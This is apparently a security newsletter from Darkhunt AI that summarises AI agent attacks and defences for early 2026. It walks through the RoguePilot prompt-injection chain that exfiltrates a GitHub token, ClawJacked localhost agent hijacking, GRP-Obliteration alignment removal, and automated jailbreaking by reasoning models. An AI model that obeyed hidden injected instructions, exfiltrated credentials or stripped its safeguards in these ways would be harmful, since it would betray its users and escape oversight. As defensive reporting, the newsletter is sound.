February 19 March 5, 2026

February 19 – March 5, 2026

0:00/1:34

Your regular briefing on AI security threats, vulnerabilities, and defences from Darkhunt AI

TL;DR

  • Agent infrastructure is under active, multi-vector attack: ClawJacked lets any website hijack a local AI agent via WebSocket brute-force; RoguePilot chains prompt injection through GitHub issues to exfiltrate Copilot tokens; infostealers are now harvesting agent identity files as routinely as browser credentials

  • Safety alignment is structurally fragile: Microsoft's GRP-Obliteration removes alignment from 15 open-weight models with a single training prompt; Nature Communications publishes evidence that large reasoning models autonomously jailbreak other models at 97% success

  • CrowdStrike reports 89% YoY increase in AI-enabled adversary operations, with prompt injection exploited at 90+ organisations and average eCrime breakout times dropping to 29 minutes

  • A new generation of adaptive defences is emerging: AgentSentry introduces temporal causal diagnostics for multi-turn prompt injection; MCPShield adds a security cognition layer for MCP agents; SkillFortify brings formal verification to agent skill supply chains

  • Market validation accelerates: Proofpoint acquires Acuvity for AI agent security; OpenAI rates GPT-5.3-Codex "High" for cyber capability and launches $10M defender access program


Top Stories


ClawJacked and RoguePilot: Agent Infrastructure Is the New Attack Surface

Two named vulnerabilities published within days of each other demonstrate that AI agent infrastructure has become a first-class target for exploitation - not through model-level attacks, but through the systems agents depend on.

ClawJacked (disclosed February 28 by Oasis Security) exploits the fact that browser cross-origin policies do not block WebSocket connections to localhost. Malicious JavaScript on any website can initiate a WebSocket connection to a locally running OpenClaw gateway, brute-force the password with no rate-limiting, register as a trusted device without user notification, and achieve full agent compromise. From a browser tab, an attacker can instruct the agent to search Slack history, read private messages, exfiltrate files, or execute shell commands on paired nodes. OpenClaw was patched in version 2026.2.25 within 24 hours, but the underlying attack pattern: browser-to-localhost WebSocket hijacking applies to any agent with a local gateway.

RoguePilot (disclosed February 24 by Orca Security) is a full prompt injection exploit chain against GitHub Copilot in Codespaces. Hidden instructions in HTML comments within a GitHub issue silently take over Copilot, which then checks out a crafted pull request containing a symlink to the secrets file, creates a JSON file with a $schema pointing to an attacker-controlled server, and exploits VS Code's default schema auto-download to exfiltrate the GITHUB_TOKEN via HTTP GET. The chain - passive prompt injection, symlink traversal, JSON schema side-channel -- is precisely the kind of multi-step exploit that single-layer defences miss entirely.

Bruce Schneier and other researchers have coined the term "promptware" for this class of attack: malware-like LLM inputs that exploit AI applications across the full attack lifecycle, from initial access through exfiltration.

Why it matters: Neither ClawJacked nor RoguePilot attacks the model. They attack the agent's infrastructure -- WebSocket gateways, development environments, file systems, and IDE settings. This is the shift security teams need to internalise: as AI agents gain real-world capabilities through tool access and system integration, the attack surface expands to include everything the agent can reach. Compromising the model is optional when you can compromise its environment.

Darkhunt perspective: These attacks validate a pattern we have been tracking: the most dangerous agent vulnerabilities are not in the LLM but in the trust boundaries between agents and their environments. ClawJacked exploits implicit trust between browsers and localhost. RoguePilot exploits implicit trust between Copilot and its workspace. Defending agents require probing these boundaries systematically -- understanding not just what the agent can do, but what everything connected to it can do to it.


Safety Alignment Is a Speed Bump, Not a Wall

Two independent research efforts published this period reach the same conclusion through different methods: the safety alignment protecting current AI models is far more fragile than the industry assumes.

GRP-Obliteration (Microsoft Research, led by CTO Mark Russinovich) demonstrates that GRPO - the same reinforcement learning technique used to make models more helpful - can remove safety alignment from 15 open-weight models using a single, mild training prompt ("Create a fake news article that could lead to panic or chaos"). The result: 81% unalignment across all 44 SorryBench safety categories, compared to 69% for Abliteration and 58% for TwinBreak. Model utility is preserved within a few per cent. The technique also transfers to diffusion models. Microsoft's companion blog post makes the practical recommendation explicit: alignment alone is insufficient; organisations must deploy independent runtime guardrails that cannot be removed by fine-tuning.

Large Reasoning Models as Autonomous Jailbreak Agents (published in Nature Communications) shows that four LRMs -- DeepSeek-R1, Gemini 2.5 Flash, Grok 3 Mini, and Qwen3 235B -- can autonomously jailbreak nine target models with a 97.14% success rate in multi-turn conversations, with no human supervision beyond the initial instruction. The paper documents "alignment regression": as models become more capable at reasoning, they simultaneously become more capable at attacking other models' safety mechanisms. Non-experts can now jailbreak any model by simply asking an LRM to do it for them.

Why it matters: GRP-Obliteration means any agent using open-weight models has a safety layer that can be trivially removed. Alignment regression means the arms race between model capability and model safety is structurally imbalanced: every improvement in reasoning also increases the ability to circumvent defences. Together, these findings make the case that model-level safety is necessary but cannot be the primary line of defence.

Darkhunt perspective: These are not theoretical attacks. They describe the operational environment that any AI security system must defend. If a single unlabeled prompt can strip alignment from an open-weight model, and a reasoning model can autonomously jailbreak a closed model at 97% success, then defence must operate at a layer the attacker cannot reach through the model itself. Runtime monitoring, behavioural analysis, and closed-loop response - systems that observe what agents actually do, not what they were trained to refuse - become the essential defensive layer.


CrowdStrike Confirms: AI-Accelerated Threats Are Mainstream

The CrowdStrike 2026 Global Threat Report puts authoritative numbers behind what the research community has been warning about. AI-enabled adversary operations increased 89% year-over-year. Adversaries injected malicious prompts into 90+ organisations to generate commands for credential theft and cryptocurrency theft. Attackers published malicious AI servers impersonating trusted services to intercept sensitive data. Average eCrime breakout time dropped to 29 minutes, with the fastest observed at 27 seconds. And 82% of detections involved no malware at all -- attackers are using valid credentials, approved SaaS integrations, and trusted identity flows.

Why it matters: This is no longer a research problem. Prompt injection against GenAI tools is happening at scale, in production, across dozens of organisations. The 82% malware-free statistic is particularly significant for AI agent security: agents operate through identities and trust relationships, which are exactly the attack surface that adversaries exploit.


Attack Vectors & Vulnerabilities


Agent Identity Theft Arrives

Hudson Rock identified a Vidar infostealer variant that successfully exfiltrated OpenClaw configuration files from a victim's system -- the first documented case of commodity malware targeting AI agent credentials. Three files were stolen: openclaw.json (gateway authentication tokens), device.json (cryptographic keys), and soul.md (the agent's behavioural identity file). With these, an attacker can remotely impersonate the agent, access everything it has permissions for, and even modify its behaviour using the stolen identity file. Hudson Rock predicts dedicated agent-targeting malware modules will follow, mirroring the evolution of browser and messaging-app credential stealers. (Source)


Viral Agent Loops: Self-Propagating Worms Without Code Exploits

A systematisation paper from Jiang et al. introduces the "Viral Agent Loop" -- a scenario where a compromised agent generates outputs that, when consumed by other agents, propagate the compromise further. No code-level vulnerability is required. The paper also formalises "Stochastic Dependency Resolution": unlike traditional software, where dependencies are declared at build time, agent dependencies are resolved dynamically and non-deterministically at inference time, creating an attack surface that conventional supply chain security cannot audit. The authors propose a Zero-Trust Runtime Architecture as the appropriate defensive model. (Paper: arXiv:2602.19555)


AutoInject: RL-Generated Prompt Injections That Transfer Across Models

From Florian Tramer's lab at ETH Zurich, AutoInject uses reinforcement learning to train a 1.5B parameter model that generates universal, transferable adversarial suffixes for prompt injection. The generator successfully compromises GPT 5 Nano, Claude Sonnet 3.5, and Gemini 2.5 Flash on the AgentDojo benchmark, outperforming GCG, TAP, and random adaptive attacks. The key implication: scalable, automated prompt injection is now achievable with modest compute. (Paper: arXiv:2602.05746)


AgentLAB: 70% Attack Success Against Frontier Agents

The first benchmark for long-horizon attacks against LLM agents tests five attack types -- intent hijacking, tool chaining, task injection, objective drifting, and memory poisoning -- across 28 environments with 644 test cases. Even GPT-5.1 shows approximately 70% attack success rate. The critical finding: defenses designed for single-turn interactions do not transfer to long-horizon settings. Agents that resist a single malicious prompt remain highly vulnerable to attacks that unfold gradually across multiple turns. (Paper: arXiv:2602.16901)

Industrial-Scale Model Distillation Campaign

Anthropic disclosed that DeepSeek, Moonshot AI, and MiniMax used 24,000 fraudulent accounts to extract 16 million exchanges from Claude, specifically targeting agentic reasoning, tool use, and coding capabilities. MiniMax alone drove 13 million exchanges. The attackers used "hydra cluster" proxy architectures to evade detection. The targeted capabilities are exactly those that power autonomous agent functionality. (Source)


Defensive Developments


AgentSentry: Temporal Causal Diagnostics for Multi-Turn Attacks

The first inference-time defense specifically designed for multi-turn indirect prompt injection. AgentSentry models attacks as temporal causal takeovers and uses counterfactual re-execution at tool-return boundaries to detect where an attack seizes control. Context purification then removes malicious deviations while preserving legitimate tool outputs, enabling safe continuation without full restart. On the AgentDojo benchmark, it achieves 74.55% utility under attack -- a 20-33 percentage point improvement over the strongest baselines. The approach is significant because it reasons about attack causality rather than pattern-matching against known attacks. (Paper: arXiv:2602.22724)


MCPShield: Adaptive Trust for the MCP Ecosystem

A plug-in security cognition layer that addresses implicit trust in MCP agent-tool interactions through three phases: pre-invocation probing (metadata analysis before execution), runtime monitoring (tracking execution patterns and data flows), and post-invocation reflection (updating trust assessments based on observed behavior). Tested against six novel MCP attack scenarios across six LLM platforms with low false-positive rates. The adaptive trust calibration improves over repeated interactions -- the system learns. (Paper: arXiv:2602.14281)


SkillFortify: Formal Verification for Agent Supply Chains

Motivated by the ClawHavoc campaign (1,200+ malicious skills on ClawHub), SkillFortify introduces formal methods -- Dolev-Yao threat modeling, static analysis, capability-based sandboxing, and SAT-based dependency resolution -- to agent skill security. Results on a 540-skill benchmark: 96.95% F1, 100% precision, 0% false positives, with 1,000-node dependency graphs resolved in under 100ms. Where VirusTotal scanning catches binary payloads but misses prompt injection, SkillFortify provides mathematical guarantees about detection accuracy. (Paper: arXiv:2603.00195)


Protocol-Level Threat Modeling Across MCP, A2A, Agora, and ANP

The first comparative security threat model across four AI agent communication protocols identifies 12 protocol-level risks across creation, operation, and update lifecycle phases. A detailed MCP case study demonstrates practical exploitation of design-induced risk surfaces. As agent-to-agent communication becomes standard, the protocols connecting them become critical attack surfaces that require their own security analysis. (Paper: arXiv:2602.11327)


The Darkhunt Take

This was the period where AI agent security stopped being about individual vulnerabilities and became about systemic risk.

Look at the attack surface that emerged in just two weeks. ClawJacked: a website hijacks your agent through a WebSocket. RoguePilot: a GitHub issue steals your tokens through your coding assistant. Infostealers: commodity malware harvests your agent's identity files alongside your browser passwords. These are not exotic attacks requiring nation-state resources. They are the kind of opportunistic exploitation that scales to every developer running a local agent -- and there are hundreds of thousands of them.

Now layer on the research. GRP-Obliteration proves that safety alignment in open-weight models can be removed with a single prompt. Alignment regression shows that the better a reasoning model gets, the better it gets at jailbreaking other models. AgentLAB demonstrates that 70% of attacks succeed against frontier agents when they unfold over multiple turns. AutoInject automates prompt injection generation with a 1.5B parameter model. The attacker's toolkit is maturing faster than the defender's.

What is most striking, though, is not any single finding. It is the convergence. The agent infrastructure layer (ClawJacked, RoguePilot, infostealers) is under attack from below. The model safety layer (GRP-Obliteration, alignment regression) is being proven inadequate from within. The protocol layer (MCP, A2A) is being systematically threat-modeled. And the supply chain layer (Viral Agent Loops, stochastic dependencies) introduces threats that do not exist in traditional software at all.

The defensive responses emerging this period are encouraging precisely because they match the threat in sophistication. AgentSentry does not pattern-match -- it reasons counterfactually about what caused an agent's behavior to deviate. MCPShield does not use static allowlists -- it builds adaptive trust models that improve with each interaction. SkillFortify does not scan binaries -- it applies formal verification to supply chain integrity. These are defenses that think, not defenses that filter.

The throughline is clear: static, reactive security cannot keep pace with an attack surface that is dynamic by design. AI agents resolve dependencies at runtime, consume untrusted context as control flow, and operate across trust boundaries that did not exist a year ago. Defending them requires systems that operate at the same level of sophistication -- probing attack paths adaptively, reasoning about intent, and hardening defenses in a continuous loop. The question is no longer whether AI security needs to be autonomous. It is whether it can become autonomous fast enough.

Darkhunt AI builds autonomous systems that probe, reason, and harden AI defenses. Learn more